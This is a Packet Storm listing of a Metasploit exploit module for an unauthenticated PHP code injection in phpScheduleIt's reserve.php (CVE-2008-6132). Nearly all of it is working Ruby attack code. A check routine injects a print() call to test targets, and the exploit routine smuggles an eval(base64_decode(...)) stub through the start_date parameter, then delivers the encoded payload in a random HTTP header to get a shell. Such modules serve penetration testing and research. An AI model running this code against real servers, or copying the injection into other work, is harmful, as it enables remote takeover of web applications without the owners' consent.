what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection

phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
Posted Oct 27, 2011
Authored by EgiX, juan vazquez | Site metasploit.com

This Metasploit module exploits an arbitrary PHP code execution flaw in the phpScheduleIt software. This vulnerability is only exploitable when the magic_quotes_gpc PHP option is 'off'. Authentication is not required to exploit the bug. Version 1.2.10 and earlier of phpScheduleIt are affected.

tags | exploit, arbitrary, php, code execution
advisories | CVE-2008-6132, OSVDB-48797
SHA-256 | 5d5d2dee3205b21a8812ad1ba723eaf15edbd136751c83c17084738dd1505d2a

phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection

Change Mirror Download
##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
option is 'off'. Authentication is not required to exploit the bug.

Version 1.2.10 and earlier of phpScheduleIt are affected.
},
'Author' =>
[
'EgiX', # Vulnerability Discovery and Exploit
'juan vazquez' # Metasploit module
],
'License' => BSD_LICENSE,
'Version' => '$Revision: 14073 $',
'References' =>
[
['CVE', '2008-6132'],
['OSVDB', '48797'],
['BID', '31520'],
['URL', 'http://www.exploit-db.com/exploits/6646/'],
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
# max header length for Apache,
# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
'Space' => 8190,
'DisableNops' => true,
'Keys' => ['php'],
},
'Targets' => [ ['Automatic', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 1 2008'))

register_options(
[
OptString.new('URI', [ true, "The full URI path to phpScheduleIt", '/phpscheduleit']),
], self.class)
end

def check
signature = rand_text_alpha(rand(10)+10)
stub = "1').${print('#{signature}')}.${die};#"
my_payload = "btnSubmit=1&start_date=#{stub}"

if datastore['URI'][-1, 1] == "/"
uri = datastore['URI'] + "reserve.php"
else
uri = datastore['URI'] + "/reserve.php"
end

print_status("Checking uri #{uri}")

response = send_request_cgi({
'method' => "POST",
'global' => true,
'uri' => uri,
'headers' => {
'Referer' => uri,
},
'data' => "#{my_payload}"
})

if response.code == 200 and response.body =~ /#{signature}/
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end

def exploit
headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
stub = "1').${error_reporting(0)}.${eval(base64_decode($_SERVER[HTTP_#{headername.gsub("-", "_")}]))};#"
my_payload = "btnSubmit=1&start_date=#{stub}"

if datastore['URI'][-1, 1] == "/"
uri = datastore['URI'] + "reserve.php"
else
uri = datastore['URI'] + "/reserve.php"
end

print_status("Sending request for: #{uri}")
print_status("Payload embedded in header: #{headername}")

response = send_request_cgi({
'method' => "POST",
'global' => true,
'uri' => uri,
'headers' => {
headername => Rex::Text.encode_base64(payload.encoded),
'Referer' => uri
},
'data' => "#{my_payload}"
}, 3)

if response and response.code != 200
print_error("Server returned a non-200 status code: (#{response.code})")
end

handler
end
end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close